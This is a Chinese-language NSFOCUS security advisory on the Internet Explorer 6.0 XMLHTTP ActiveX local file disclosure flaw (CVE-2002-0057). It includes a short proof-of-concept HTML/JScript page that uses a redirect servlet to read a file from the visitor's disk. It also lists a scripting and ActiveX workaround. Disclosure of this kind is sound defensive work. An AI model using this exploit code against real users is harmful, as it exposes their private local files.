首页 -> 安全研究

安全研究

安全漏洞
Microsoft IE XMLHTTP文件泄露漏洞

发布日期:2001-12-15
更新日期:2001-12-21

受影响系统:
Microsoft Internet Explorer 6.0
    - Microsoft Windows NT 4.0 SP6a
    - Microsoft Windows NT
    - Microsoft Windows ME
    - Microsoft Windows 98
    - Microsoft Windows 2000 SP3
    - Microsoft Windows 2000 Server SP2
    - Microsoft Windows 2000 Server SP1
描述:
BUGTRAQ  ID: 3699
CVE(CAN) ID: CVE-2002-0057

Microsoft Internet Explorer是和Windows系统捆绑的流行的Web浏览器。

与IE 6.0一起发布的XMLHTTP ActiveX控件存在漏洞,使攻击者可以获取浏览者本地主机上的文件。

当IE的XMLHTTP控件响应一个文件重定向请求时,它会去处理请求所指向的文件而并不会顾及URL协议。如果重定向指向的是本地文件系统里的文件,则文件的内容会暴露给调用XMLHTTP控件的脚本。这样就会导致用户敏感信息的泄露。

<*来源:jelmer (jelmer@kuperus.xs4all.nl
  
  链接:http://www.xs4all.nl/~jkuperus/bug.htm
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

jelmer (jelmer@kuperus.xs4all.nl)提供了如下的漏洞测试方法:

访问Web服务器上有如下代码的HTML页面:
<html>
    <head>
        <title>Exploit</title>

        <script language="jscript">

            function doIt() {

                // open the file on the users harddisk using a http redirect

                var xmlhttp = new ActiveXObject ("Microsoft.XMLHTTP");
                xmlhttp.Open("GET", "servlet/RedirectServlet?fileName=c:/jelmer.txt", false);
                xmlhttp.Send();

                alert(xmlhttp.responseText);

            }

        </script>
    </head>
    <body>

        <button onclick="doIt()">Do it</button>

    </body>
</html>

则攻击者就可以访问到c:/jelmer.txt文件,如果攻击者知道其它的文件名,他一样也可以访问到。

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 在IE中设置禁止活动脚本和ActiveX控件的执行。

厂商补丁:

Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.microsoft.com/windows/ie/default.asp

浏览次数:3415
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障